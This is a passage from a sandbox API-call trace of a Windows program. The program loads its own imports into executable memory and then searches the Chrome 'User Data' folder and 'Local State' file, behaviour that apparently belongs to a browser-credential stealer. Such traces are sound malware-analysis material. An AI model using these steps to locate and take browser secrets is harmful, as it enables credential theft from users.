GetProcessHeap () returned 0x4c0000 [0174.409] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4dc) returned 0x520270 [0174.409] GetProcessHeap () returned 0x4c0000 [0174.409] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x51f758 [0174.409] GetProcessHeap () returned 0x4c0000 [0174.409] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x480) returned 0x520758 [0174.409] GetProcessHeap () returned 0x4c0000 [0174.409] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c) returned 0x4ee258 [0174.409] memcpy (in: _Dst=0xeb61ce6, _Src=0x51b4e6, _Size=0x133a | out: _Dst=0xeb61ce6) returned 0xeb61ce6 [0174.409] memcpy (in: _Dst=0xeb63020, _Src=0x514820, _Size=0x3846 | out: _Dst=0xeb63020) returned 0xeb63020 [0174.409] GetProcessHeap () returned 0x4c0000 [0174.409] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4a4) returned 0x520be0 [0174.410] GetProcessHeap () returned 0x4c0000 [0174.410] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x51f230 [0174.410] GetProcessHeap () returned 0x4c0000 [0174.410] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x480) returned 0x521090 [0174.410] GetProcessHeap () returned 0x4c0000 [0174.410] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c) returned 0x4ee280 [0174.410] memcpy (in: _Dst=0xeb66866, _Src=0x518066, _Size=0x2c3a | out: _Dst=0xeb66866) returned 0xeb66866 [0174.410] memcpy (in: _Dst=0x50db10, _Src=0x8bcc178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.410] memcpy (in: _Dst=0xeb694a0, _Src=0x51aca0, _Size=0x12c4 | out: _Dst=0xeb694a0) returned 0xeb694a0 [0174.411] GetProcessHeap () returned 0x4c0000 [0174.411] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4dc) returned 0x521518 [0174.411] GetProcessHeap () returned 0x4c0000 [0174.411] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x51f128 [0174.411] GetProcessHeap () returned 0x4c0000 [0174.411] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x480) returned 0x521a00 [0174.411] GetProcessHeap () returned 0x4c0000 [0174.411] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c) returned 0x4ee3c0 [0174.411] memcpy (in: _Dst=0xeb6a764, _Src=0x51bf64, _Size=0x8bc | out: _Dst=0xeb6a764) returned 0xeb6a764 [0174.411] memcpy (in: _Dst=0xeb6b020, _Src=0x514820, _Size=0x5faf | out: _Dst=0xeb6b020) returned 0xeb6b020 [0174.411] GetProcessHeap () returned 0x4c0000 [0174.411] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4b8) returned 0x521e88 [0174.412] GetProcessHeap () returned 0x4c0000 [0174.412] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x51f808 [0174.412] GetProcessHeap () returned 0x4c0000 [0174.412] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x480) returned 0x522348 [0174.412] GetProcessHeap () returned 0x4c0000 [0174.412] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c) returned 0x4ee2a8 [0174.412] memcpy (in: _Dst=0xeb70fcf, _Src=0x51a7cf, _Size=0x2051 | out: _Dst=0xeb70fcf) returned 0xeb70fcf [0174.412] memcpy (in: _Dst=0xeb73020, _Src=0x514820, _Size=0x2db4 | out: _Dst=0xeb73020) returned 0xeb73020 [0174.412] GetProcessHeap () returned 0x4c0000 [0174.412] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c0) returned 0x5227d0 [0174.412] GetProcessHeap () returned 0x4c0000 [0174.412] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x51f860 [0174.412] GetProcessHeap () returned 0x4c0000 [0174.412] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x480) returned 0x522c98 [0174.413] GetProcessHeap () returned 0x4c0000 [0174.413] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c) returned 0x4ee398 [0174.413] memcpy (in: _Dst=0xeb75dd4, _Src=0x5175d4, _Size=0x1f14 | out: _Dst=0xeb75dd4) returned 0xeb75dd4 [0174.413] memcpy (in: _Dst=0x50db10, _Src=0x8bd0178, _Size=0x301 | out: _Dst=0x50db10) returned 0x50db10 [0174.413] memcpy (in: _Dst=0xeb77ce8, _Src=0x5194e8, _Size=0xd10 | out: _Dst=0xeb77ce8) returned 0xeb77ce8 [0174.414] GetProcessHeap () returned 0x4c0000 [0174.414] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0xf423f) returned 0xeb81020 [0174.417] GetProcessHeap () returned 0x4c0000 [0174.417] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x20) returned 0x4ee438 [0174.417] GetProcessHeap () returned 0x4c0000 [0174.417] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x2f8) returned 0x4fd7b0 [0174.417] VirtualAlloc (lpAddress=0x60900000, dwSize=0x911b0, flAllocationType=0x3000, flProtect=0x40) returned 0x60900000 [0174.490] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76720000 [0174.490] GetProcessHeap () returned 0x4c0000 [0174.491] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x40) returned 0x4f2b98 [0174.491] GetProcAddress (hModule=0x76720000, lpProcName="AreFileApisANSI") returned 0x7673f300 [0174.491] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0174.491] GetProcAddress (hModule=0x76720000, lpProcName="CreateFileA") returned 0x76746880 [0174.491] GetProcAddress (hModule=0x76720000, lpProcName="CreateFileMappingA") returned 0x767379c0 [0174.492] GetProcAddress (hModule=0x76720000, lpProcName="CreateFileMappingW") returned 0x767399b0 [0174.492] GetProcAddress (hModule=0x76720000, lpProcName="CreateFileW") returned 0x76746890 [0174.492] GetProcAddress (hModule=0x76720000, lpProcName="CreateMutexW") returned 0x767466f0 [0174.492] GetProcAddress (hModule=0x76720000, lpProcName="DeleteCriticalSection") returned 0x77220e60 [0174.492] GetProcAddress (hModule=0x76720000, lpProcName="DeleteFileA") returned 0x767468b0 [0174.493] GetProcAddress (hModule=0x76720000, lpProcName="DeleteFileW") returned 0x767468c0 [0174.493] GetProcAddress (hModule=0x76720000, lpProcName="EnterCriticalSection") returned 0x7720f290 [0174.493] GetProcAddress (hModule=0x76720000, lpProcName="FlushFileBuffers") returned 0x767469b0 [0174.493] GetProcAddress (hModule=0x76720000, lpProcName="FormatMessageA") returned 0x7673f830 [0174.493] GetProcAddress (hModule=0x76720000, lpProcName="FormatMessageW") returned 0x76744f80 [0174.493] GetProcAddress (hModule=0x76720000, lpProcName="FreeLibrary") returned 0x76739f50 [0174.494] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentProcessId") returned 0x767323e0 [0174.494] GetProcAddress (hModule=0x76720000, lpProcName="GetDiskFreeSpaceA") returned 0x767469c0 [0174.494] GetProcAddress (hModule=0x76720000, lpProcName="GetDiskFreeSpaceW") returned 0x767469f0 [0174.494] GetProcAddress (hModule=0x76720000, lpProcName="GetFileAttributesA") returned 0x76746a20 [0174.494] GetProcAddress (hModule=0x76720000, lpProcName="GetFileAttributesExW") returned 0x76746a40 [0174.494] GetProcAddress (hModule=0x76720000, lpProcName="GetFileAttributesW") returned 0x76746a50 [0174.494] GetProcAddress (hModule=0x76720000, lpProcName="GetFileSize") returned 0x76746a70 [0174.495] GetProcAddress (hModule=0x76720000, lpProcName="GetFullPathNameA") returned 0x76746ad0 [0174.495] GetProcAddress (hModule=0x76720000, lpProcName="GetFullPathNameW") returned 0x76746ae0 [0174.495] GetProcAddress (hModule=0x76720000, lpProcName="GetLastError") returned 0x76733870 [0174.495] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleHandleA") returned 0x767399f0 [0174.495] GetProcAddress (hModule=0x76720000, lpProcName="GetProcAddress") returned 0x767378b0 [0174.495] GetProcAddress (hModule=0x76720000, lpProcName="GetProcessHeap") returned 0x76737710 [0174.495] GetProcAddress (hModule=0x76720000, lpProcName="GetSystemInfo") returned 0x7673a0f0 [0174.496] GetProcAddress (hModule=0x76720000, lpProcName="GetSystemTime") returned 0x76744940 [0174.496] GetProcAddress (hModule=0x76720000, lpProcName="GetSystemTimeAsFileTime") returned 0x76737620 [0174.498] GetProcAddress (hModule=0x76720000, lpProcName="GetTempPathA") returned 0x76746b20 [0174.498] GetProcAddress (hModule=0x76720000, lpProcName="GetTempPathW") returned 0x76746b30 [0174.498] GetProcAddress (hModule=0x76720000, lpProcName="GetTickCount") returned 0x76745eb0 [0174.498] GetProcAddress (hModule=0x76720000, lpProcName="GetVersionExA") returned 0x7673a700 [0174.499] GetProcAddress (hModule=0x76720000, lpProcName="GetVersionExW") returned 0x7673aa80 [0174.499] GetProcAddress (hModule=0x76720000, lpProcName="HeapAlloc") returned 0x77202bd0 [0174.499] GetProcAddress (hModule=0x76720000, lpProcName="HeapCompact") returned 0x767612a0 [0174.499] GetProcAddress (hModule=0x76720000, lpProcName="HeapCreate") returned 0x7673a100 [0174.499] GetProcAddress (hModule=0x76720000, lpProcName="HeapDestroy") returned 0x76744c30 [0174.499] GetProcAddress (hModule=0x76720000, lpProcName="HeapFree") returned 0x76731ba0 [0174.499] GetProcAddress (hModule=0x76720000, lpProcName="HeapReAlloc") returned 0x771fefe0 [0174.499] GetProcAddress (hModule=0x76720000, lpProcName="HeapSize") returned 0x771fbb20 [0174.500] GetProcAddress (hModule=0x76720000, lpProcName="HeapValidate") returned 0x7673cf80 [0174.500] GetProcAddress (hModule=0x76720000, lpProcName="InitializeCriticalSection") returned 0x7722a200 [0174.500] GetProcAddress (hModule=0x76720000, lpProcName="InterlockedCompareExchange") returned 0x76743ff0 [0174.500] GetProcAddress (hModule=0x76720000, lpProcName="LeaveCriticalSection") returned 0x7720f210 [0174.500] GetProcAddress (hModule=0x76720000, lpProcName="LoadLibraryA") returned 0x76744bf0 [0174.500] GetProcAddress (hModule=0x76720000, lpProcName="LoadLibraryW") returned 0x7673a840 [0174.500] GetProcAddress (hModule=0x76720000, lpProcName="LocalFree") returned 0x767379a0 [0174.500] GetProcAddress (hModule=0x76720000, lpProcName="LockFile") returned 0x76746b80 [0174.501] GetProcAddress (hModule=0x76720000, lpProcName="LockFileEx") returned 0x76746b90 [0174.501] GetProcAddress (hModule=0x76720000, lpProcName="MapViewOfFile") returned 0x76738d60 [0174.501] GetProcAddress (hModule=0x76720000, lpProcName="MultiByteToWideChar") returned 0x76732ad0 [0174.501] GetProcAddress (hModule=0x76720000, lpProcName="OutputDebugStringA") returned 0x7673fde0 [0174.501] GetProcAddress (hModule=0x76720000, lpProcName="OutputDebugStringW") returned 0x767619a0 [0174.501] GetProcAddress (hModule=0x76720000, lpProcName="QueryPerformanceCounter") returned 0x767338a0 [0174.501] GetProcAddress (hModule=0x76720000, lpProcName="ReadFile") returned 0x76746bb0 [0174.501] GetProcAddress (hModule=0x76720000, lpProcName="SetEndOfFile") returned 0x76746c00 [0174.501] GetProcAddress (hModule=0x76720000, lpProcName="SetFilePointer") returned 0x76746c40 [0174.502] GetProcAddress (hModule=0x76720000, lpProcName="Sleep") returned 0x76737990 [0174.502] GetProcAddress (hModule=0x76720000, lpProcName="SystemTimeToFileTime") returned 0x76744c10 [0174.502] GetProcAddress (hModule=0x76720000, lpProcName="TlsGetValue") returned 0x76731b70 [0174.502] GetProcAddress (hModule=0x76720000, lpProcName="UnlockFile") returned 0x76746c80 [0174.502] GetProcAddress (hModule=0x76720000, lpProcName="UnlockFileEx") returned 0x76746c90 [0174.502] GetProcAddress (hModule=0x76720000, lpProcName="UnmapViewOfFile") returned 0x76739b20 [0174.502] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0174.502] GetProcAddress (hModule=0x76720000, lpProcName="VirtualQuery") returned 0x76737a90 [0174.503] GetProcAddress (hModule=0x76720000, lpProcName="WaitForSingleObject") returned 0x76746820 [0174.503] GetProcAddress (hModule=0x76720000, lpProcName="WideCharToMultiByte") returned 0x76733880 [0174.503] GetProcAddress (hModule=0x76720000, lpProcName="WriteFile") returned 0x76746ca0 [0174.503] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x76a90000 [0174.503] GetProcAddress (hModule=0x76a90000, lpProcName="__dllonexit") returned 0x76ae7250 [0174.503] GetProcAddress (hModule=0x76a90000, lpProcName="_errno") returned 0x76ac5cd0 [0174.503] GetProcAddress (hModule=0x76a90000, lpProcName="_iob") returned 0x76b41208 [0174.503] GetProcAddress (hModule=0x76a90000, lpProcName="_winmajor") returned 0x76b44b98 [0174.504] GetProcAddress (hModule=0x76a90000, lpProcName="abort") returned 0x76aebb60 [0174.504] GetProcAddress (hModule=0x76a90000, lpProcName="calloc") returned 0x76ad76f0 [0174.504] GetProcAddress (hModule=0x76a90000, lpProcName="fflush") returned 0x76b033d0 [0174.504] GetProcAddress (hModule=0x76a90000, lpProcName="free") returned 0x76ad7740 [0174.504] GetProcAddress (hModule=0x76a90000, lpProcName="fwrite") returned 0x76b09810 [0174.504] GetProcAddress (hModule=0x76a90000, lpProcName="localtime") returned 0x76b1ded0 [0174.504] GetProcAddress (hModule=0x76a90000, lpProcName="malloc") returned 0x76ad7900 [0174.504] GetProcAddress (hModule=0x76a90000, lpProcName="memcmp") returned 0x76b18440 [0174.504] GetProcAddress (hModule=0x76a90000, lpProcName="memmove") returned 0x76b188b0 [0174.505] GetProcAddress (hModule=0x76a90000, lpProcName="memset") returned 0x76b18c80 [0174.505] GetProcAddress (hModule=0x76a90000, lpProcName="qsort") returned 0x76aec200 [0174.505] GetProcAddress (hModule=0x76a90000, lpProcName="realloc") returned 0x76ad79f0 [0174.505] GetProcAddress (hModule=0x76a90000, lpProcName="strcmp") returned 0x76b18e60 [0174.505] GetProcAddress (hModule=0x76a90000, lpProcName="strncmp") returned 0x76b19290 [0174.505] GetProcAddress (hModule=0x76a90000, lpProcName="vfprintf") returned 0x76b05c40 [0174.505] VirtualProtect (in: lpAddress=0x60901000, dwSize=0x6cec0, flNewProtect=0x20, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.519] VirtualProtect (in: lpAddress=0x6096e000, dwSize=0xfb0, flNewProtect=0x4, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.519] VirtualProtect (in: lpAddress=0x6096f000, dwSize=0xad24, flNewProtect=0x2, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.519] VirtualProtect (in: lpAddress=0x6097a000, dwSize=0x498, flNewProtect=0x4, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.520] VirtualProtect (in: lpAddress=0x6097b000, dwSize=0x1998, flNewProtect=0x2, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.520] VirtualProtect (in: lpAddress=0x6097d000, dwSize=0xa4c, flNewProtect=0x4, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.520] VirtualProtect (in: lpAddress=0x6097e000, dwSize=0x18, flNewProtect=0x4, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.520] VirtualProtect (in: lpAddress=0x6097f000, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.520] VirtualProtect (in: lpAddress=0x60980000, dwSize=0x27fc, flNewProtect=0x2, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.521] VirtualProtect (in: lpAddress=0x60983000, dwSize=0x160, flNewProtect=0x2, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.521] VirtualProtect (in: lpAddress=0x60984000, dwSize=0x3c8, flNewProtect=0x2, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.521] VirtualProtect (in: lpAddress=0x60985000, dwSize=0x64d, flNewProtect=0x2, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.521] VirtualProtect (in: lpAddress=0x60986000, dwSize=0x4360, flNewProtect=0x2, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.521] VirtualProtect (in: lpAddress=0x6098b000, dwSize=0xd84, flNewProtect=0x2, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.521] VirtualProtect (in: lpAddress=0x6098c000, dwSize=0xb94, flNewProtect=0x2, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.521] VirtualProtect (in: lpAddress=0x6098d000, dwSize=0x504, flNewProtect=0x2, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.522] VirtualProtect (in: lpAddress=0x6098e000, dwSize=0x10d, flNewProtect=0x2, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.522] VirtualProtect (in: lpAddress=0x6098f000, dwSize=0x19db, flNewProtect=0x2, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.522] VirtualProtect (in: lpAddress=0x60991000, dwSize=0x1b0, flNewProtect=0x2, lpflOldProtect=0x1985f8 | out: lpflOldProtect=0x1985f8*=0x40) returned 1 [0174.525] malloc (_Size=0x80) returned 0x8779b8 [0174.586] __dllonexit () returned 0x609011d0 [0174.587] __dllonexit () returned 0x6096d420 [0174.587] GetProcessHeap () returned 0x4c0000 [0174.587] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4fd7b0 | out: hHeap=0x4c0000) returned 1 [0174.587] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.619] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data" [0174.620] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data" [0174.620] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" [0174.620] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\local state")) returned 0xffffffff [0174.626] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*") returned 61 [0174.626] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x740061, ftCreationTime.dwLowDateTime=0x5c0061, ftCreationTime.dwHighDateTime=0x6f004c, ftLastAccessTime.dwLowDateTime=0x610063, ftLastAccessTime.dwHighDateTime=0x20006c, ftLastWriteTime.dwLowDateTime=0x740053, ftLastWriteTime.dwHighDateTime=0x740061, nFileSizeHigh=0x65, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ù\x01")) returned 0xffffffff [0174.628] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.628] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.628] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.628] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.628] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.628] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.628] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.628] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.628] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.628] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.629] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.629] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.629] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.629] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.629] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.629] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.629] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.629] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.629] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: 